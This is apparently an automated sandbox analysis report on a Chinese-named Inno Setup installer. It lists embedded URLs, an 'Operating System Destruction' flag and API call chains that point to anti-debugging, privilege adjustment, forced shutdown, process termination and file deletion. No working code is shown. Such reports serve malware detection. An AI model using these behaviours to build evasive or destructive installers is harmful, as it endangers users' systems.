Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007F7BB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2069328889.0000000000AF1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000000.2162499297.0000000000FFD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007F7BB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2069328889.0000000000AF1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000000.2162499297.0000000000FFD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.2.drStatic PE information: section name: .=~
Source: update.vac.7.drStatic PE information: section name: .=~
Source: hrsw.vbc.7.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF43886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF43886
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,7_2_6C0C5120
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C0C5D60
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF43A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF43A6A
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF439CF
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF43D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF43D62
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF43D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF43D18
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF43C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF43C62
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF41950: CreateFileA,DeviceIoControl,CloseHandle,7_2_6BF41950
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF44754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,7_2_6BF44754
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF54A277_2_6BF54A27
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF447547_2_6BF44754
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C18807_2_6C0C1880
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C6A437_2_6C0C6A43
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C126CE07_2_6C126CE0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C176D107_2_6C176D10
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C194DE07_2_6C194DE0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0F8EA17_2_6C0F8EA1
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C112EC97_2_6C112EC9
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17EEF07_2_6C17EEF0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C14AEEF7_2_6C14AEEF
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C16E8107_2_6C16E810
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1868207_2_6C186820
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1948707_2_6C194870
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1448967_2_6C144896
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C18C8D07_2_6C18C8D0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C19A91A7_2_6C19A91A
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1769007_2_6C176900
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C18A9307_2_6C18A930
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1889507_2_6C188950
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0F89727_2_6C0F8972
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1969997_2_6C196999
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C19AA007_2_6C19AA00
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C150A527_2_6C150A52
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C184AA07_2_6C184AA0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C110B667_2_6C110B66
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C16AB907_2_6C16AB90
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C18EBC07_2_6C18EBC0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C100BCA7_2_6C100BCA
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1844897_2_6C184489
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1584AC7_2_6C1584AC
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17E4D07_2_6C17E4D0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1625217_2_6C162521
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1885207_2_6C188520
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17C5807_2_6C17C580
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1725807_2_6C172580
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1745D07_2_6C1745D0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C18E6007_2_6C18E600
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1946C07_2_6C1946C0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1867A07_2_6C1867A0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0FC7CF7_2_6C0FC7CF
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1967C07_2_6C1967C0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C15C7F37_2_6C15C7F3
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1700207_2_6C170020
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17E0E07_2_6C17E0E0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1882007_2_6C188200
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C18C2A07_2_6C18C2A0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C173D507_2_6C173D50
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C147D437_2_6C147D43
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C195D907_2_6C195D90
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C179E807_2_6C179E80
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C151F117_2_6C151F11
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C16589F7_2_6C16589F
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1878C87_2_6C1878C8
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1799F07_2_6C1799F0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C16FA507_2_6C16FA50
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C171AA07_2_6C171AA0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C16DAD07_2_6C16DAD0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C11540A7_2_6C11540A
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17F5C07_2_6C17F5C0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C13F5EC7_2_6C13F5EC
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C16B6507_2_6C16B650
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C18F6407_2_6C18F640
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1796E07_2_6C1796E0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1997007_2_6C199700
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1937C07_2_6C1937C0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17F0507_2_6C17F050
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1130927_2_6C113092
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1771F07_2_6C1771F0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17D2807_2_6C17D280
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C17D3807_2_6C17D380
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C186AF07_2_6C186AF0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C1837507_2_6C183750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005A81EC11_2_005A81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E81C011_2_005E81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005D425011_2_005D4250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F824011_2_005F8240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FC3C011_2_005FC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F04C811_2_005F04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005D865011_2_005D8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005DC95011_2_005DC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005B094311_2_005B0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005D8C2011_2_005D8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F0E0011_2_005F0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F4EA011_2_005F4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005ED08911_2_005ED089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005C10AC11_2_005C10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F112011_2_005F1120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005DD1D011_2_005DD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F91C011_2_005F91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E518011_2_005E5180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FD2C011_2_005FD2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005653CF11_2_005653CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005C53F311_2_005C53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FD47011_2_005FD470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F54D011_2_005F54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005AD49611_2_005AD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F155011_2_005F1550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0056157211_2_00561572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005B965211_2_005B9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005ED6A011_2_005ED6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0057976611_2_00579766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005697CA11_2_005697CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FD9E011_2_005FD9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00561AA111_2_00561AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E5E8011_2_005E5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E5F8011_2_005E5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0057E00A11_2_0057E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E22E011_2_005E22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0060230011_2_00602300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005CE49F11_2_005CE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E25F011_2_005E25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005D66D011_2_005D66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005DA6A011_2_005DA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FE99011_2_005FE990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E2A8011_2_005E2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005BAB1111_2_005BAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E6CE011_2_005E6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E70D011_2_005E70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005CB12111_2_005CB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005DB18011_2_005DB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F720011_2_005F7200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FF3C011_2_005FF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0058B3E411_2_0058B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005EF3A011_2_005EF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005D741011_2_005D7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005EF42011_2_005EF420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005DF50011_2_005DF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F353011_2_005F3530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0060351A11_2_0060351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FF59911_2_005FF599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0060360111_2_00603601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005F77C011_2_005F77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005D379011_2_005D3790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0058F8E011_2_0058F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005DF91011_2_005DF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0057BAC911_2_0057BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E7AF011_2_005E7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005B3AEF11_2_005B3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E7C5011_2_005E7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0057BC9211_2_0057BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005DFDF011_2_005DFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00561E40 appears 172 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 005628E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 005FFB10 appears 723 times
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: String function: 6C196F10 appears 728 times
